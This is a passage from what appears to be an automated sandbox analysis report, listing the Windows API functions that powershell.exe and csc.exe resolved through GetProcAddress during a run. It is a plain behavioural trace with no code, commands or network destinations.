\"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKey (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserNameEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EnumCalendarInfoExEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCalendarInfoEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EnumSystemLocalesEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EnumTimeFormatsEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ReleaseMutex (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegisterEventSource (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegisterEventSourceW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DeregisterEventSource (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ReportEvent (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ReportEventW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetLogicalDrives (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetDriveType (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter PathIsNetworkPath (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter PathIsNetworkPathW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileAttributes (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetConsoleTextAttribute (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetConsoleTextAttributeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WriteConsole (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WriteConsoleW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCurrentDirectoryW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectory (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetTempPath (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetTempPathW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DeleteFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DeleteFileW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguageW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FindFirstFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FindNextFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter UnmapViewOfFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateAssemblyNameObject (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateAssemblyNameObjectW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoGetObjectContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateAssemblyEnum (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateAssemblyEnumW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter BCryptOpenAlgorithmProvider (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter BCryptGetProperty (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter BCryptCreateHash (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter BCryptHashData (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WVTAsn1SpcIndirectDataContentDecode (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter PsVerifyHash (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter BCryptFinishHash (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptSetHashParam (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptVerifySignatureA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter BCryptDestroyHash (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserProfileDirectoryW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter I_CryptNetGetConnectivity (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter IsNetworkAlive (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptRetrieveObjectByUrlW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter UrlGetPartW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpOpen (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter StrRChrA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetProductInfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetOption (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpSetTimeouts (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpSetOption (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpCrackUrl (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter StrCmpNW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpConnect (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSAStringToAddressW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHAddressToString (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHEnumProtocols (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHGetProviderGuid (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHGetSockaddrType (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHGetSocketInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHGetWSAProtocolInfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHGetWildcardSockaddr (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHGetWinsockMapping (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHIoctl (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHJoinLeaf (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHNotify (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHOpenSocket2 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHSetSocketInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSHStringToAddress (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpOpenRequest (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter UrlCanonicalizeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpGetDefaultProxyConfiguration (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpGetIEProxyConfigForCurrentUser (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RtlConvertSidToUnicodeString (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NsiAllocateAndGetTable (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CM_Open_Class_Key_ExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NsiFreeTable (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpGetProxyForUrl (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcAsyncInitializeHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NotifyServiceStatusChangeW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter StartServiceW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NdrAsyncClientCall (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcAsyncCompleteCall (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpTimeFromSystemTime (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpSendRequest (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpReceiveResponse (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpQueryHeaders (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter StrStrIW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpQueryDataAvailable (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpReadData (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpCloseHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcEpResolveBinding (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NdrClientCall2 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CryptGetKeyParam (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CertDllVerifyRevocation (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SaferiSearchMatchingHashRules (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WTHelperGetProvCertFromChain (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WTHelperGetProvCertFromChainW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CertFreeCertificateContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CertDuplicateCertificateContext (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CertGetCertificateContextProperty (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CertDuplicateCertificateContextW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter AddRefActCtx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ReleaseActCtx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetCurrentActCtx (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleOutputCP (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetConsoleOutputCPW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter TranslateCharsetInfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter TranslateCharsetInfoW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptor (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateDirectory (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetStdHandleW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentStrings (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentStringsW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FreeEnvironmentStrings (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FreeEnvironmentStringsW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateProcess (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CreateProcessW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DuplicateHandle (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFile (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter URLDownloadToFileW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter IUnknown_QueryService (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FreeAddrInfoExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleFileName (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter DefWindowProcA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CorExitProcess_RetAddr (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter CorExitProcess (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetNamedSecurityInfo (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter SetNamedSecurityInfoA (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RemoveDirectory (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter RemoveDirectoryW (UID: 00000000-00006096)\n \"powershell.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006096)\n \"csc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CreateALink (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter CLRCreateInstance (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00005220)\n \"csc.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00005220)\n 